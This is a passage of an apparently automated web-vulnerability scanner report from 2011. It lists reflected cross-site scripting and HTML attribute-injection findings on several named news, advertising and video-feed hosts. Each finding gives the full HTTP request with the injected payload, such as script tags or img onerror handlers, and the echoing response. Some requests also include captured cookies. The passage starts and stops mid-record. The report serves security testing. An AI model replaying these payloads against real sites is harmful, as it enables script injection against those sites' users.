User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.4
X-Runtime: 65
Status: 404
Vary: Accept-Encoding
Content-Length: 36586
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Date: Wed, 07 Sep 2011 14:20:02 GMT
Connection: close

<!DOCTYPE html>



<!--[if
...[SNIP]...
<link rel="canonical" href="http://mozo.com.au/imagesfe631"a="b"7b2b26a4785/sprite-widget-17.png">
...[SNIP]...

2.43. http://mozo-widgets.f2.com.au/images/sprite-widget-17.png [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://mozo-widgets.f2.com.au
Path:	/images/sprite-widget-17.png

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 63eb5"a%3d"b"8301f8a2a40 was submitted in the REST URL parameter 2. This input was echoed as 63eb5"a="b"8301f8a2a40 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /images/sprite-widget-17.png63eb5"a%3d"b"8301f8a2a40?1315376813 HTTP/1.1
Host: mozo-widgets.f2.com.au
Proxy-Connection: keep-alive
Referer: http://mozo-widgets.f2.com.au/widgets/multiwidget3/SMH/FM-BUSINESS
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.4
X-Runtime: 286
Status: 404
Vary: Accept-Encoding
Content-Length: 36586
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Date: Wed, 07 Sep 2011 14:20:15 GMT
Connection: close

<!DOCTYPE html>



<!--[if
...[SNIP]...
<link rel="canonical" href="http://mozo.com.au/images/sprite-widget-17.png63eb5"a="b"8301f8a2a40">
...[SNIP]...

2.44. http://mozo-widgets.f2.com.au/images/sprite-widget-logos.png [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://mozo-widgets.f2.com.au
Path:	/images/sprite-widget-logos.png

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d37ce"a%3d"b"69269d76801 was submitted in the REST URL parameter 1. This input was echoed as d37ce"a="b"69269d76801 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /imagesd37ce"a%3d"b"69269d76801/sprite-widget-logos.png?1315376813 HTTP/1.1
Host: mozo-widgets.f2.com.au
Proxy-Connection: keep-alive
Referer: http://mozo-widgets.f2.com.au/widgets/multiwidget3/SMH/FM-BUSINESS
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.4
X-Runtime: 62
Status: 404
Vary: Accept-Encoding
Content-Length: 36592
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Date: Wed, 07 Sep 2011 14:20:01 GMT
Connection: close

<!DOCTYPE html>



<!--[if
...[SNIP]...
<link rel="canonical" href="http://mozo.com.au/imagesd37ce"a="b"69269d76801/sprite-widget-logos.png">
...[SNIP]...

2.45. http://mozo-widgets.f2.com.au/images/sprite-widget-logos.png [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://mozo-widgets.f2.com.au
Path:	/images/sprite-widget-logos.png

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8a301"a%3d"b"aa15a3c938b was submitted in the REST URL parameter 2. This input was echoed as 8a301"a="b"aa15a3c938b in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /images/sprite-widget-logos.png8a301"a%3d"b"aa15a3c938b?1315376813 HTTP/1.1
Host: mozo-widgets.f2.com.au
Proxy-Connection: keep-alive
Referer: http://mozo-widgets.f2.com.au/widgets/multiwidget3/SMH/FM-BUSINESS
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.4
X-Runtime: 68
Status: 404
Vary: Accept-Encoding
Content-Length: 36592
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Date: Wed, 07 Sep 2011 14:20:16 GMT
Connection: close

<!DOCTYPE html>



<!--[if
...[SNIP]...
<link rel="canonical" href="http://mozo.com.au/images/sprite-widget-logos.png8a301"a="b"aa15a3c938b">
...[SNIP]...

2.46. http://mozo-widgets.f2.com.au/widgets/multiwidget3/SMH/FM-BUSINESS [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://mozo-widgets.f2.com.au
Path:	/widgets/multiwidget3/SMH/FM-BUSINESS

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 93259"a%3d"b"03e6d5a7576 was submitted in the REST URL parameter 1. This input was echoed as 93259"a="b"03e6d5a7576 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /widgets93259"a%3d"b"03e6d5a7576/multiwidget3/SMH/FM-BUSINESS HTTP/1.1
Host: mozo-widgets.f2.com.au
Proxy-Connection: keep-alive
Referer: http://www.smh.com.au/business
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.4
X-Runtime: 64
Status: 404
Vary: Accept-Encoding
Content-Length: 36521
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Date: Wed, 07 Sep 2011 14:19:59 GMT
Connection: close

<!DOCTYPE html>



<!--[if
...[SNIP]...
<link rel="canonical" href="http://mozo.com.au/widgets93259"a="b"03e6d5a7576/multiwidget3/SMH/FM-BUSINESS">
...[SNIP]...

2.47. http://mozo-widgets.f2.com.au/widgets/multiwidget3/SMH/FM-BUSINESS [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://mozo-widgets.f2.com.au
Path:	/widgets/multiwidget3/SMH/FM-BUSINESS

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7024f"a%3d"b"33aba3305a9 was submitted in the REST URL parameter 2. This input was echoed as 7024f"a="b"33aba3305a9 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /widgets/multiwidget37024f"a%3d"b"33aba3305a9/SMH/FM-BUSINESS HTTP/1.1
Host: mozo-widgets.f2.com.au
Proxy-Connection: keep-alive
Referer: http://www.smh.com.au/business
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.4
Status: 404
Vary: Accept-Encoding
Content-Length: 36513
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Date: Wed, 07 Sep 2011 14:20:15 GMT
Connection: close

<!DOCTYPE html>



<!--[if
...[SNIP]...
<link rel="canonical" href="http://mozo.com.au/widgets/multiwidget37024f"a="b"33aba3305a9/SMH/FM-BUSINESS">
...[SNIP]...

2.48. http://mozo-widgets.f2.com.au/widgets/multiwidget3/WAT/FM-NEWS [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://mozo-widgets.f2.com.au
Path:	/widgets/multiwidget3/WAT/FM-NEWS

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b47c6"a%3d"b"bc6e98538a1 was submitted in the REST URL parameter 1. This input was echoed as b47c6"a="b"bc6e98538a1 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /widgetsb47c6"a%3d"b"bc6e98538a1/multiwidget3/WAT/FM-NEWS HTTP/1.1
Host: mozo-widgets.f2.com.au
Proxy-Connection: keep-alive
Referer: http://www.watoday.com.au/wa-news/thousands-of-wa-households-went-cold-and-hungry-abs-20110906-1jvz4.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.4
X-Runtime: 63
Status: 404
Vary: Accept-Encoding
Content-Length: 36663
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Date: Wed, 07 Sep 2011 14:21:33 GMT
Connection: close

<!DOCTYPE html>



<!--[if
...[SNIP]...
<link rel="canonical" href="http://mozo.com.au/widgetsb47c6"a="b"bc6e98538a1/multiwidget3/WAT/FM-NEWS">
...[SNIP]...

2.49. http://mozo-widgets.f2.com.au/widgets/multiwidget3/WAT/FM-NEWS [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://mozo-widgets.f2.com.au
Path:	/widgets/multiwidget3/WAT/FM-NEWS

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c41da"a%3d"b"4bceb315c12 was submitted in the REST URL parameter 2. This input was echoed as c41da"a="b"4bceb315c12 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /widgets/multiwidget3c41da"a%3d"b"4bceb315c12/WAT/FM-NEWS HTTP/1.1
Host: mozo-widgets.f2.com.au
Proxy-Connection: keep-alive
Referer: http://www.watoday.com.au/wa-news/thousands-of-wa-households-went-cold-and-hungry-abs-20110906-1jvz4.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.5
Status: 404
Vary: Accept-Encoding
Content-Length: 36655
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Date: Wed, 07 Sep 2011 14:22:51 GMT
Connection: close

<!DOCTYPE html>



<!--[if
...[SNIP]...
<link rel="canonical" href="http://mozo.com.au/widgets/multiwidget3c41da"a="b"4bceb315c12/WAT/FM-NEWS">
...[SNIP]...

2.50. http://ndm.feeds.theplatform.com/ps/JSON/PortalService/2.1/getReleaseList [PID parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ndm.feeds.theplatform.com
Path:	/ps/JSON/PortalService/2.1/getReleaseList

Issue detail

The value of the PID request parameter is copied into the HTML document as plain text between tags. The payload 90e3c<img%20src%3da%20onerror%3dalert(1)>504638d47ac was submitted in the PID parameter. This input was echoed as 90e3c<img src=a onerror=alert(1)>504638d47ac in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /ps/JSON/PortalService/2.1/getReleaseList?PID=sd_f83nBw8ui5CQcrU8nqqGqLVaIDlch90e3c<img%20src%3da%20onerror%3dalert(1)>504638d47ac&startIndex=1&endIndex=20&field=title&field=description&field=thumbnailURL&field=length&field=assets&field=PID&field=requestCount&field=contentID&field=length&field=airdate&query=categoryIDs|841970789&callback=_jqjsp HTTP/1.1
Host: ndm.feeds.theplatform.com
Proxy-Connection: keep-alive
Referer: http://www.perthnow.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/plain;charset=UTF-8
Date: Wed, 07 Sep 2011 14:15:59 GMT
X-Cache: MISS from feeds.theplatform.com
Via: 1.0 sea1squid01 (squid/3.0.STABLE23)
Connection: close

_jqjsp("The PID looks like it was cut-off (\"sd_f83nBw8ui5CQcrU8nqqGqLVaIDlch90e3c<img src=a onerror=alert(1)>504638d47ac\"). This PID is 76 character(s) long, when it should be 32 characters long.");

2.51. http://ndm.feeds.theplatform.com/ps/JSON/PortalService/2.1/getReleaseList [callback parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ndm.feeds.theplatform.com
Path:	/ps/JSON/PortalService/2.1/getReleaseList

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 7ac77<script>alert(1)</script>25eedfac9ac was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ps/JSON/PortalService/2.1/getReleaseList?PID=sd_f83nBw8ui5CQcrU8nqqGqLVaIDlch&startIndex=1&endIndex=20&field=title&field=description&field=thumbnailURL&field=length&field=assets&field=PID&field=requestCount&field=contentID&field=length&field=airdate&query=categoryIDs|841970789&callback=_jqjsp7ac77<script>alert(1)</script>25eedfac9ac HTTP/1.1
Host: ndm.feeds.theplatform.com
Proxy-Connection: keep-alive
Referer: http://www.perthnow.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Cache-Control: max-age=300
Expires: Wed, 07 Sep 2011 14:23:20 GMT
Content-Type: text/plain;charset=UTF-8
Date: Wed, 07 Sep 2011 14:18:19 GMT
X-Cache: MISS from feeds.theplatform.com
Via: 1.0 sea1squid03 (squid/3.0.STABLE23)
Connection: close

_jqjsp7ac77<script>alert(1)</script>25eedfac9ac({"context":"","listInfo":{"itemCount":20,"totalCount":22},"items":[{"airdate":1315379040000,"assets":[{"assetType":"Reference Image","encodingProfile":"","height":366,"URL":"http://content.video.news.
...[SNIP]...

2.52. http://ndm.feeds.theplatform.com/ps/JSON/PortalService/2.1/getReleaseList [endIndex parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ndm.feeds.theplatform.com
Path:	/ps/JSON/PortalService/2.1/getReleaseList

Issue detail

The value of the endIndex request parameter is copied into the HTML document as plain text between tags. The payload 50d2d<img%20src%3da%20onerror%3dalert(1)>282c5ab2dc8 was submitted in the endIndex parameter. This input was echoed as 50d2d<img src=a onerror=alert(1)>282c5ab2dc8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /ps/JSON/PortalService/2.1/getReleaseList?PID=sd_f83nBw8ui5CQcrU8nqqGqLVaIDlch&startIndex=1&endIndex=2050d2d<img%20src%3da%20onerror%3dalert(1)>282c5ab2dc8&field=title&field=description&field=thumbnailURL&field=length&field=assets&field=PID&field=requestCount&field=contentID&field=length&field=airdate&query=categoryIDs|841970789&callback=_jqjsp HTTP/1.1
Host: ndm.feeds.theplatform.com
Proxy-Connection: keep-alive
Referer: http://www.perthnow.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/plain;charset=UTF-8
Date: Wed, 07 Sep 2011 14:16:36 GMT
X-Cache: MISS from feeds.theplatform.com
Via: 1.0 sea1squid01 (squid/3.0.STABLE23)
Connection: close

_jqjsp("Illegal argument. For input string: \"2050d2d<img src=a onerror=alert(1)>282c5ab2dc8\"");

2.53. http://ndm.feeds.theplatform.com/ps/JSON/PortalService/2.1/getReleaseList [query parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ndm.feeds.theplatform.com
Path:	/ps/JSON/PortalService/2.1/getReleaseList

Issue detail

The value of the query request parameter is copied into the HTML document as plain text between tags. The payload b5e97<img%20src%3da%20onerror%3dalert(1)>b9a0d61c0ef was submitted in the query parameter. This input was echoed as b5e97<img src=a onerror=alert(1)>b9a0d61c0ef in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /ps/JSON/PortalService/2.1/getReleaseList?PID=sd_f83nBw8ui5CQcrU8nqqGqLVaIDlch&startIndex=1&endIndex=20&field=title&field=description&field=thumbnailURL&field=length&field=assets&field=PID&field=requestCount&field=contentID&field=length&field=airdate&query=categoryIDs|841970789b5e97<img%20src%3da%20onerror%3dalert(1)>b9a0d61c0ef&callback=_jqjsp HTTP/1.1
Host: ndm.feeds.theplatform.com
Proxy-Connection: keep-alive
Referer: http://www.perthnow.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/plain;charset=UTF-8
Date: Wed, 07 Sep 2011 14:18:18 GMT
X-Cache: MISS from feeds.theplatform.com
Via: 1.0 sea1squid03 (squid/3.0.STABLE23)
Connection: close

_jqjsp("Invalid ID parameter found: 841970789b5e97<img src=a onerror=alert(1)>b9a0d61c0ef");

2.54. http://ndm.feeds.theplatform.com/ps/JSON/PortalService/2.1/getReleaseList [startIndex parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ndm.feeds.theplatform.com
Path:	/ps/JSON/PortalService/2.1/getReleaseList

Issue detail

The value of the startIndex request parameter is copied into the HTML document as plain text between tags. The payload 8faab<img%20src%3da%20onerror%3dalert(1)>69586683c36 was submitted in the startIndex parameter. This input was echoed as 8faab<img src=a onerror=alert(1)>69586683c36 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /ps/JSON/PortalService/2.1/getReleaseList?PID=sd_f83nBw8ui5CQcrU8nqqGqLVaIDlch&startIndex=18faab<img%20src%3da%20onerror%3dalert(1)>69586683c36&endIndex=20&field=title&field=description&field=thumbnailURL&field=length&field=assets&field=PID&field=requestCount&field=contentID&field=length&field=airdate&query=categoryIDs|841970789&callback=_jqjsp HTTP/1.1
Host: ndm.feeds.theplatform.com
Proxy-Connection: keep-alive
Referer: http://www.perthnow.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/plain;charset=UTF-8
Date: Wed, 07 Sep 2011 14:16:25 GMT
X-Cache: MISS from feeds.theplatform.com
Via: 1.0 sea1squid02 (squid/3.0.STABLE23)
Connection: close

_jqjsp("Illegal argument. For input string: \"18faab<img src=a onerror=alert(1)>69586683c36\"");

2.55. http://pixel.invitemedia.com/rubicon_sync [publisher_redirecturl parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://pixel.invitemedia.com
Path:	/rubicon_sync

Issue detail

The value of the publisher_redirecturl request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2f4d5"><script>alert(1)</script>2124e81ff80 was submitted in the publisher_redirecturl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /rubicon_sync?publisher_user_id=f772ba986ce1d14ae944dfcb2540fa9b434bfac6&publisher_dsp_id=2101&publisher_call_type=iframe&publisher_redirecturl=http://tap.rubiconproject.com/oz/feeds/invite-media-rtb/tokens/2f4d5"><script>alert(1)</script>2124e81ff80 HTTP/1.1
Host: pixel.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://tap2-cdn.rubiconproject.com/partner/scripts/rubicon/emily.html?rtb_ext=1&pc=7856/12590
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=*

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Wed, 07 Sep 2011 14:15:21 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Wed, 07-Sep-2011 14:15:01 GMT
Content-Type: text/html
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 264

<html><body><img width="0" height="0" src="http://tap.rubiconproject.com/oz/feeds/invite-media-rtb/tokens/2f4d5"><script>alert(1)</script>2124e81ff80?publisher_dsp_id=2101&external_user_id=435e5758-1bdb-4563-ab69-51d400bd766e&Expiration=1315836921"/>
...[SNIP]...

2.56. http://pluck.abc.net.au/ver1.0/daapi2.api [cb parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://pluck.abc.net.au
Path:	/ver1.0/daapi2.api

Issue detail

The value of the cb request parameter is copied into the HTML document as plain text between tags. The payload e1761<img%20src%3da%20onerror%3dalert(1)>6d23c9e6b04 was submitted in the cb parameter. This input was echoed as e1761<img src=a onerror=alert(1)>6d23c9e6b04 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /ver1.0/daapi2.api?jsonRequest=%7B%22Envelopes%22%3A%5B%7B%22Payload%22%3A%7B%22ObjectType%22%3A%22Requests.Users.UserRequest%22%2C%22UserKey%22%3A%7B%22Key%22%3A%22%22%2C%22ObjectType%22%3A%22Models.Users.UserKey%22%7D%7D%2C%22PayloadType%22%3A%22Requests.Users.UserRequest%22%7D%5D%2C%22Metadata%22%3Anull%2C%22ObjectType%22%3A%22Requests.RequestBatch%22%7D&cb=PluckSDK.jsonpcb('request_0')e1761<img%20src%3da%20onerror%3dalert(1)>6d23c9e6b04 HTTP/1.1
Host: pluck.abc.net.au
Proxy-Connection: keep-alive
Referer: http://www.abc.net.au/perth/news/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=242052946.1543285740.1315422868.1315422868.1315422868.1; __utmb=242052946.2.10.1315422868; __utmc=242052946; __utmz=242052946.1315422868.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=perth%20news

Response

2.57. http://pluck.abc.net.au/ver1.0/daapi2.api [jsonRequest parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://pluck.abc.net.au
Path:	/ver1.0/daapi2.api

Issue detail

The value of the jsonRequest request parameter is copied into the HTML document as plain text between tags. The payload 82bb7<img%20src%3da%20onerror%3dalert(1)>faa916c3a66 was submitted in the jsonRequest parameter. This input was echoed as 82bb7<img src=a onerror=alert(1)>faa916c3a66 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /ver1.0/daapi2.api?jsonRequest=%7B%22Envelopes%22%3A%5B%7B%22Payload%22%3A%7B%22ObjectType%22%3A%22Requests.Users.UserRequest%22%2C%22UserKey%22%3A%7B%22Key%22%3A%22%22%2C%22ObjectType%22%3A%22Models.Users.UserKey%22%7D%7D%2C%22PayloadType%22%3A%22Requests.Users.UserRequest%22%7D%5D%2C%22Metadata%22%3Anull%2C%22ObjectType%22%3A%22Requests.RequestBatch%22%7D82bb7<img%20src%3da%20onerror%3dalert(1)>faa916c3a66&cb=PluckSDK.jsonpcb('request_0') HTTP/1.1
Host: pluck.abc.net.au
Proxy-Connection: keep-alive
Referer: http://www.abc.net.au/perth/news/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=242052946.1543285740.1315422868.1315422868.1315422868.1; __utmb=242052946.2.10.1315422868; __utmc=242052946; __utmz=242052946.1315422868.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=perth%20news

Response

HTTP/1.1 200 OK
